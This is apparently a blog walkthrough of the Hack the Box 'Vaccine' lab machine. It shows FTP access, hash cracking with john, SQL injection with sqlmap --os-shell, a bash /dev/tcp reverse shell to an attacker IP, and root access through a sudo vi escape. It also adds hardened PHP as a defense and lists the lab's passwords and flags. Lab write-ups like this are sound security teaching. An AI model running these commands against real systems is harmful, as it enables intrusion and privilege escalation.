This article discusses the solution for Hack the Box Vaccine Challenge tasks so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Vaccine Solution
Besides SSH and HTTP, what other service is hosted on this box?
Run an nmap scan with the `-sV` (version of services) and `-sC` (default scripts for service discovery and vulnerability detection) options:
```
nmap -sV -sC {target_machine_ip}
```
For example: `nmap -sC -sV 10.129.251.21`
Answer: ftp
This service can be configured to allow login with any password for specific username. What is that username?
As the nmap results above show, the `-sC` option was able to determine that anonymous FTP login is allowed. If you do a Google search, the username for this is usually `anonymous`.
Answer: anonymous
What is the name of the file downloaded over this service?
- Let's connect via ftp:
```
ftp {target_machine_ip}
```
For the username just use `anonymous` and enter a blank password. Enter `ls` and you will find `backup.zip`. Run `get backup.zip` to download it.
Answer: backup.zip
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
We try to unzip backup.zip, however a password is required.
A quick Google search will give you the answer.
Answer: zip2john
What is the password for the admin user on the website?
Let's run the `zip2john` script to crack the password. First let's obtain the password hash:
```
zip2john backup.zip > zip.txt
```
Then let's crack the password for backup.zip:
```
john zip.txt
```
Now let's unzip backup.zip with the password `741852963`. This gives us two files, `index.php` and `style.css`.
```
unzip backup.zip
```
- Now let's investigate index.php with `vim index.php`. Here we find a hashed password `2cb42f8734ea607eefed3b70af13bbd3` for the username `admin`.
Let's analyze the hash type using any hash analyzer. We use https://hashes.com/en/tools/hash_identifier in this case and find that it is in MD5 format.
Create a file called `admin-hash.txt`, then insert the hash found in the previous step. Let's crack the hash using john:
```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 admin-hash.txt
```
Answer: qwerty789
What option can be passed to sqlmap to try to get command execution via the sql injection?
Log in using username `admin` and password `qwerty789`. Go to the browser and get the `PHPSESSID` cookie value.
- Next, as we view the page after we log in, we can see one possible form to attack with SQL injection. We observe that submitting it appends a query parameter `search`.
- Let's use sqlmap and run the following:
```
sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}"
sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}" --os-shell
```
- We have spawned an os-shell as user postgres. However, executing `sudo -l` does not yield any meaningful results. The os-shell is limited in the commands it can execute; it is not interactive.
- Let's go to our attack machine and create a netcat listener:
```
nc -lvnp 5000
```
- On the target machine, from the sqlmap os-shell, let's connect back to our listener to spawn a reverse shell:
```
bash -c "bash -i >& /dev/tcp/{attack_machine_ip}/5000 0>&1"
```
- We have spawned a reverse shell, however we do not have an interactive shell yet.
- Run the following to get an interactive shell:
```
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm
```
- We now have an interactive shell. However, we have to know the password of user `postgres` to run `sudo -l`.
- We have to find the password on the system. Since this server is running a website, one of the places we can look is `/var/www/`.
- Let's explore each of the files in the `html` folder. In the `dashboard.php` file we find the postgres password `P@s5w0rd!`.
- We test this password at the password prompt for `sudo -l`, where we find that we have sudo rights for the vi program.
Answer: vi
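The two weaknesses that drive this section are the unsalted MD5 admin hash in index.php and the injectable `search` parameter in dashboard.php (plus the fact that the web app talks to the database as the postgres superuser). The following is an added example of what the hardened PHP would look like; it is not the box's own code, and the DSN, the `webapp` role, and the `cars`/`users` table and column names are assumptions.

```php
<?php
// Added example, not the box's dashboard.php/index.php. Assumed: PostgreSQL
// via PDO, a low-privilege role "webapp", tables cars(name, type) and
// users(username, password_hash). The DB password comes from the environment
// instead of a literal in the PHP source (which is where the walkthrough found it).
declare(strict_types=1);

function db(): PDO
{
    // Not the postgres superuser: without superuser rights (or membership in
    // pg_execute_server_program on PostgreSQL 11+) the database cannot run
    // COPY ... TO PROGRAM, which is what lets sqlmap turn SQL injection into
    // an --os-shell.
    $pdo = new PDO('pgsql:host=127.0.0.1;dbname=carsdb', 'webapp', (string) getenv('DB_PASSWORD'));
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // real server-side prepares
    return $pdo;
}

// Vulnerable pattern (reconstructed for illustration, not quoted from the box):
//   "SELECT * FROM cars WHERE name ILIKE '%" . $_GET['search'] . "%'"
// Hardened: the search term only ever travels as a bound parameter.
function searchCars(PDO $pdo, string $term): array
{
    $stmt = $pdo->prepare('SELECT name, type FROM cars WHERE name ILIKE :pattern');
    // Escape LIKE metacharacters too, so a user cannot widen the pattern.
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt->execute([':pattern' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// index.php compared the submitted password with an unsalted MD5 digest,
// which john cracked with rockyou.txt above. Hardened: a salted, slow hash
// produced by password_hash() and checked with password_verify().
function verifyLogin(PDO $pdo, string $user, string $password): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Unknown user: still run one verify so timing does not reveal valid usernames.
    $hash = ($row !== false) ? $row['password_hash'] : password_hash('placeholder', PASSWORD_DEFAULT);
    return password_verify($password, $hash) && $row !== false;
}
```

Wiring it into the page is then `searchCars(db(), $_GET['search'] ?? '')` for the dashboard and `verifyLogin(db(), $_POST['username'], $_POST['password'])` for the login form.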
Submit user flag
Our reverse shell connection keeps getting disconnected from the server. Since we know the password (`P@s5w0rd!`) of the user `postgres`, let's just connect via ssh:
```
ssh postgres@{target_machine_ip}
```
Run `cd ~/` to go to the postgres user's home folder and see if there is something interesting. In here we will find `user.txt`.
Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Submit the root flag
Continuing with our terminal established via the ssh connection in the previous section: we know that our current `postgres` user has sudo privileges for `vi`. Now let's attempt privilege escalation. Let's go to https://gtfobins.github.io/gtfobins/vi/#shell to check if we can run a command to escalate our privileges to root.
Run the following:
```
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
Then execute the following from inside vi, based on GTFOBins:
```
:set shell=/bin/sh
:shell
```
Now we have escalated our privileges and have a shell with root privileges. Let's look for `root.txt`:
```
find / -type f -name "root.txt"
```
Now let's look at the file to get the flag:
```
vi /root/root.txt
```
Answer: ddd6e058e814260bc70e9bbdef2715849
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)